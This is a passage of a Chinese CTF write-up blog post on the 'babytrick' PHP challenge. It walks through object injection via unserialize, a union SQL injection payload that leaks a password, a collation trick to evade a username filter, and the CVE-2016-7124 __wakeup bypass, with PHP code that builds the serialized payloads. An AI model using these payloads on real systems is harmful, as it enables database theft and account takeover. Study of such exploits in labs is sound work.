class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>分析逻辑<br>data读入-&gt;反序列化-&gt;wakeup执行（一次过滤）-&gt;destruct执行（调用对应的函数）-&gt;show(读入username查询)<br>这样看应该很明显了，show逻辑明显存在注入，__wakeup绕过<br>通过分析得知我们首先要获取到账户和密码才能进行下一步的登陆获得flag<br>从源码中可以看到使用了unserialize函数并且没有过滤，且定义了类。所以想到php反序列化漏洞、对象注入。<br>要想得到flag，需要利用反序列化执行类中函数login。首先需要用户orange密码(如果存在orange的话)，于是利用类中show函数得到密码。</p>
<h2 id="通过show-方法找到"><a href="#通过show-方法找到" class="headerlink" title="通过show()方法找到"></a>通过show()方法找到</h2><p>看show函数我们可以看出未对参数进行过滤，可以进行sql注入，构造语句为：<br>bla’ union select password,username,password from users where username=’orange’– –<br>我们首先是需要对HITCON类进行序列化</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class HITCON&#123;</span><br><span class="line">    private $method&#x3D;&quot;show&quot;;</span><br><span class="line">    private $args&#x3D;array(&quot;bla&#39; union select password,username,role from users where username&#x3D;&#39;orange&#39; -- &quot;);</span><br><span class="line">    private $conn&#x3D;1;</span><br><span class="line">&#125;</span><br><span class="line">$payload1 &#x3D; new HITCON();</span><br><span class="line">echo serialize($payload1);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>payload:<br><a href="http://vps1.blue-whale.me:23333/?get=1&amp;data=O:6:&quot;HITCON&quot;:3:{s:14:&quot;%00HITCON%00method&quot;;s:4:&quot;show&quot;;s:12:&quot;%00HITCON%00args&quot;;a:1:{i:0;s:79:&quot;bla&#39;" target="_blank" rel="noopener">http://vps1.blue-whale.me:23333/?get=1&amp;data=O:6:&quot;HITCON&quot;:3:{s:14:&quot;%00HITCON%00method&quot;;s:4:&quot;show&quot;;s:12:&quot;%00HITCON%00args&quot;;a:1:{i:0;s:79:&quot;bla&#39;</a> union select password,username,role from users where username=’orange’ – “;}s:12:”HITCONconn”;i:1;}<br>得到{“msg”:”Orange_New_Password is admin”}<br>所以orange的密码Orange_New_Password</p>
<h3 id="ps-这里有一个点：我们的payload-当字符串为private类型时，序列化时生成的序列化字符串中类名前后会有0×00，url编码下为-00。如果不加的话，会得到结果-“msg”-”What-do-you-do-”-。所有我们加上了-00（或者直接都进行url编码）"><a href="#ps-这里有一个点：我们的payload-当字符串为private类型时，序列化时生成的序列化字符串中类名前后会有0×00，url编码下为-00。如果不加的话，会得到结果-“msg”-”What-do-you-do-”-。所有我们加上了-00（或者直接都进行url编码）" class="headerlink" title="ps:这里有一个点：我们的payload:当字符串为private类型时，序列化时生成的序列化字符串中类名前后会有0×00，url编码下为%00。如果不加的话，会得到结果{“msg”:”What do you do?”}。所有我们加上了%00（或者直接都进行url编码）"></a>ps:这里有一个点：我们的payload:当字符串为private类型时，序列化时生成的序列化字符串中类名前后会有0×00，url编码下为%00。如果不加的话，会得到结果{“msg”:”What do you do?”}。所有我们加上了%00（或者直接都进行url编码）</h3><h2 id="login-方法"><a href="#login-方法" class="headerlink" title="login()方法"></a>login()方法</h2><p>在执行了show()方法之后，按照同样的方法来执行login()方法。<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class HITCON&#123;</span><br><span class="line">    private $method;</span><br><span class="line">    private $args;</span><br><span class="line">    private $conn;</span><br><span class="line"></span><br><span class="line">    public function __construct($method, $args) &#123;</span><br><span class="line">        $this-&gt;method &#x3D; $method;</span><br><span class="line">        $this-&gt;args &#x3D; $args;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$args[&#39;username&#39;] &#x3D; &#39;ORANGE&#39;;</span><br><span class="line">$args[&#39;password&#39;] &#x3D; &#39;Orange_New_Password&#39;;</span><br><span class="line">$data &#x3D; new HITCON(&#39;login&#39;,$args);</span><br><span class="line">echo urlencode(serialize($data));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>将生成的Payload提交，提示<br>{“msg”:”Orange is so shy. He do not want to see you.”}<br>仔细看代码，发现在login()方法中还存在如下的代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if ( $username &#x3D;&#x3D; &#39;orange&#39; || stripos($sql, &#39;orange&#39;) !&#x3D; false ) &#123;</span><br><span class="line">    $this-&gt;__die(&quot;Orange is so shy. He do not want to see you.&quot;);</span><br><span class="line">&#125;&#x2F;&#x2F;如果username&#x3D;orange时就会被过滤</span><br></pre></td></tr></table></figure>
<p>之前猪猪侠在微博上面说过的话，就可以绕过这个检测。原话如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MYSQL 中 utf8_unicode_ci和utf8_general_ci两种编码格式,utf8_general_ci不区分大小写,Ä &#x3D; A, Ö &#x3D; O, Ü &#x3D; U这三种条件都成立,对于utf8_general_ci下面的等式成立：ß&#x3D;s,但是，对于utf8_unicode_ci下面等式才成立：ß &#x3D; ss</span><br></pre></td></tr></table></figure>
<p>所以在将mysql的编码设置为utf-8的时候，Ä = A, Ö = O, Ü = U,，左右两边的字符是可以相互替换的。这样就可以将0替换为Ö这样就可以绕过上面代码的检测，同时还可以能够正确地执行SQL语句。<br>我们通过如下的代码得到最终的payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class HITCON&#123;</span><br><span class="line">    private $method;</span><br><span class="line">    private $args;</span><br><span class="line">    private $conn;</span><br><span class="line"></span><br><span class="line">    public function __construct($method, $args) &#123;</span><br><span class="line">        $this-&gt;method &#x3D; $method;</span><br><span class="line">        $this-&gt;args &#x3D; $args;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$args[&#39;username&#39;] &#x3D; &#39;ORÄNG&#39;;</span><br><span class="line">$args[&#39;password&#39;] &#x3D; &#39;Orange_New_Password&#39;;</span><br><span class="line">$data &#x3D; new HITCON(&#39;login&#39;,$args);</span><br><span class="line">echo urlencode(serialize($data));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>这样提交按理来说就有flag了，但是和之前一样显示{“msg”:”Orange is so shy. He do not want to see you.”}。GG。不知道哪里出了问题，难道是数据库编码格式不是utf8_general_ci？默认情况下就是这个，不应该啊。。想不明白。</p>
<h3 id="绕过-wakeup："><a href="#绕过-wakeup：" class="headerlink" title="绕过__wakeup："></a>绕过__wakeup：</h3><p>魔术方法<strong>wakeup，其中函数会对我们的输入进行过滤、转义。如何绕过</strong>wakeup呢？谷歌发现了CVE-2016-7124。简单来说就是当序列化字符串中，如果表示对象属性个数的值大于真实的属性个数时就会跳过<strong>wakeup的执行。<br>执行login()方法的时候，同样需要绕过</strong>wakeup()方法，那么就需要利用<strong>wakeup()函数的漏洞了，但是在最后执行的payload中并没有修改对象属性的个数，猜测可能是Ä这个字符影响了</strong>wakeup()函数的执行。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/15/Confusion1/" rel="next" title="Confusion1">
                <i class="fa fa-chevron-left"></i> Confusion1
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Richard LEE</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#RSA2"><span class="nav-number">1.</span> <span class="nav-text">RSA2</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#基本原理"><span class="nav-number">1.1.</span> <span class="nav-text">基本原理:</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#公钥与私钥的产生："><span class="nav-number">1.1.1.</span> <span class="nav-text">公钥与私钥的产生：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#消息加密"><span class="nav-number">1.1.2.</span> <span class="nav-text">消息加密:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#消息解密"><span class="nav-number">1.1.3.</span> <span class="nav-text">消息解密:</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题-RSA2"><span class="nav-number">1.2.</span> <span class="nav-text">解题 RSA2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Wiener-Tricky"><span class="nav-number">1.3.</span> <span class="nav-text">Wiener Tricky</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#使用RSACtfTool根据公钥计算私钥"><span class="nav-number">1.3.0.1.</span> <span class="nav-text">使用RSACtfTool根据公钥计算私钥</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用openssl根据公钥和私钥解开密文文件"><span class="nav-number">1.3.0.2.</span> <span class="nav-text">使用openssl根据公钥和私钥解开密文文件</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#misc-BabyBase"><span class="nav-number">2.</span> <span class="nav-text">misc BabyBase</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web-babytrick"><span class="nav-number">3.</span> <span class="nav-text">web babytrick</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#通过show-方法找到"><span class="nav-number">3.1.</span> <span class="nav-text">通过show()方法找到</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ps-这里有一个点：我们的payload-当字符串为private类型时，序列化时生成的序列化字符串中类名前后会有0×00，url编码下为-00。如果不加的话，会得到结果-“msg”-”What-do-you-do-”-。所有我们加上了-00（或者直接都进行url编码）"><span class="nav-number">3.1.1.</span> <span class="nav-text">ps:这里有一个点：我们的payload:当字符串为private类型时，序列化时生成的序列化字符串中类名前后会有0×00，url编码下为%00。如果不加的话，会得到结果{“msg”:”What do you do?”}。所有我们加上了%00（或者直接都进行url编码）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#login-方法"><span class="nav-number">3.2.</span> <span class="nav-text">login()方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过-wakeup："><span class="nav-number">3.2.1.</span> <span class="nav-text">绕过__wakeup：</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Richard LEE</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

</body>
</html>
